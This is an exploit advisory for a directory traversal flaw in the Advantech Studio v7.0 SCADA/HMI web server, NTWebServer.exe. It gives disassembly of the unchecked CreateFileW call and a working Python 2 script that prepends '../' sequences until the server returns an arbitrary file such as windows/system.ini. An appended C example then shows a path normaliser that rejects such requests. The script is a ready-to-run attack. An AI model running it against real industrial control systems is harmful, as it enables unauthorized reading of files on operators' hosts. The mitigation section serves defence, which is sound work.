# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A

'''
Advantech Studio v7.0 SCADA/HMI has a built-in web server, NTWebServer.exe. The web
server is a standalone executable that is shipped alongside every project to serve as
a web-based management interface with the help of an ActiveX control.

The flaw occurs because there is no check at all on the path of the requested file:
the path taken from the HTTP request is handed straight to CreateFileW, so "../"
sequences walk out of the web root and any file the server's account can read is
served back to the client.

The call site at .text:00402A4A passes the request path (lpFileName) unchanged into
sub_401A90:

.text:00402A4A    push    0               ; dwFlagsAndAttributes
.text:00402A4C    push    3               ; dwCreationDisposition
.text:00402A4E    push    3               ; dwShareMode
.text:00402A50    push    80000000h       ; dwDesiredAccess
.text:00402A55    mov     edx, [ebp+lpFileName]
.text:00402A58    push    edx             ; lpFileName
.text:00402A59    lea     ecx, [ebp+var_1C]
.text:00402A5C    call    sub_401A90

sub_401A90 is a thin wrapper that forwards its arguments directly to CreateFileW,
without any validation of lpFileName:

.text:00401A97    push    0               ; hTemplateFile
.text:00401A99    mov     eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C    push    eax             ; dwFlagsAndAttributes
.text:00401A9D    mov     ecx, [ebp+dwCreationDisposition]
.text:00401AA0    push    ecx             ; dwCreationDisposition
.text:00401AA1    push    0               ; lpSecurityAttributes
.text:00401AA3    mov     edx, [ebp+dwShareMode]
.text:00401AA6    push    edx             ; dwShareMode
.text:00401AA7    mov     eax, [ebp+dwDesiredAccess]
.text:00401AAA    push    eax             ; dwDesiredAccess
.text:00401AAB    mov     ecx, [ebp+lpFileName]
.text:00401AAE    push    ecx             ; lpFileName
.text:00401AAF    call    ds:CreateFileW

dwDesiredAccess = 80000000h is GENERIC_READ and dwCreationDisposition = 3 is
OPEN_EXISTING, so the bug is an arbitrary file read, not a write.
'''

# Python 2 (httplib, print statement). Walks up the directory tree one "../" at a
# time until the server returns something other than 404 for the requested file.
import argparse
import httplib

MAX_NESTED_DIRECTORY = 32


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d')   # target host
    parser.add_argument('-p')   # target port
    parser.add_argument('-f')   # file to fetch, relative to the drive root
    args = parser.parse_args()

    if args.d is None or args.p is None or args.f is None:
        print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
        return

    httpConn = httplib.HTTPConnection(args.d, int(args.p))

    # Try 0 .. MAX_NESTED_DIRECTORY-1 levels of "../"; stop at the first hit.
    for i in xrange(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content = resp.read()
        if resp.status == 404:
            print 'Not found ' + temp
        else:
            print 'Found ' + temp
            print '------------------------------------------'
            print content
            print '---------------------------------------EOF'
            break


def MakePath(f, count):
    # Prefix the requested file with "count" copies of "../"
    a = ""
    for i in xrange(0, count):
        a = a + "../"
    return a + f


if __name__ == "__main__":
    main()
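The check that is missing in front of the CreateFileW call, as an added example that is not part of the advisory and not Advantech's code: a lexical normaliser that resolves the request path against a web root and rejects anything that climbs above it (including the backslash and drive-letter forms the exploit script does not try). The web-root path and the sample requests are constructed for illustration; it is assumed the caller has already percent-decoded the request and rejected embedded NUL bytes, since neither survives as a C string.

```c
/* Added example (not the advisory's code, not Advantech's): the path check
 * NTWebServer.exe omits before calling CreateFileW.  Portable C, no Win32
 * calls, so it compiles anywhere.  Assumed: the request is already
 * percent-decoded and contains no NUL byte. */
#include <stdio.h>
#include <string.h>

#define MAX_SEGS 64

/* Returns 1 and writes "<docroot>/<clean path>" to out when the request stays
 * inside docroot; returns 0 when it escapes the root, carries a drive letter
 * or stream specifier, has too many components, or does not fit in out. */
int map_request_path(const char *docroot, const char *request,
                     char *out, size_t outlen)
{
    const char *segs[MAX_SEGS];
    size_t lens[MAX_SEGS];
    int n = 0;
    const char *p = request;

    while (*p) {
        /* '\\' is treated like '/': the target runs on Windows, where
         * CreateFileW accepts both separators. */
        while (*p == '/' || *p == '\\')
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && *p != '/' && *p != '\\')
            p++;
        size_t len = (size_t)(p - start);

        if (len == 1 && start[0] == '.')
            continue;                       /* "." is a no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (n == 0)
                return 0;                   /* ".." above the web root */
            n--;                            /* ".." inside it: pop */
            continue;
        }
        if (memchr(start, ':', len))
            return 0;                       /* "C:" or "file::$DATA" */
        if (n == MAX_SEGS)
            return 0;
        segs[n] = start;
        lens[n] = len;
        n++;
    }

    /* Rebuild the path under docroot; every component is now a plain name. */
    size_t used = strlen(docroot);
    if (used + 1 > outlen)
        return 0;
    memcpy(out, docroot, used);
    for (int i = 0; i < n; i++) {
        if (used + 1 + lens[i] + 1 > outlen)   /* '/' + name + NUL */
            return 0;
        out[used++] = '/';
        memcpy(out + used, segs[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return 1;
}

int main(void)
{
    /* Constructed requests: the exploit's payload, a backslash variant,
     * a drive-letter variant, and two ordinary in-root files. */
    const char *requests[] = {
        "/index.html",
        "../../windows/system.ini",
        "..\\..\\windows\\system.ini",
        "C:/windows/system.ini",
        "/css/../img/./logo.png",
    };
    char resolved[256];
    for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        if (map_request_path("C:/AdvantechStudio/web", requests[i],
                             resolved, sizeof resolved))
            printf("allow  %-32s -> %s\n", requests[i], resolved);
        else
            printf("reject %s\n", requests[i]);
    }
    return 0;
}
```

Rejecting ".." at depth zero also refuses harmless requests such as "/../index.html"; that is deliberate, since a client that sends them is either broken or probing. The normalisation is purely lexical, so it does not defend against symbolic links or junctions inside the web root; on Windows that needs an additional check on the handle after the open (for example via GetFinalPathNameByHandleW) rather than on the string.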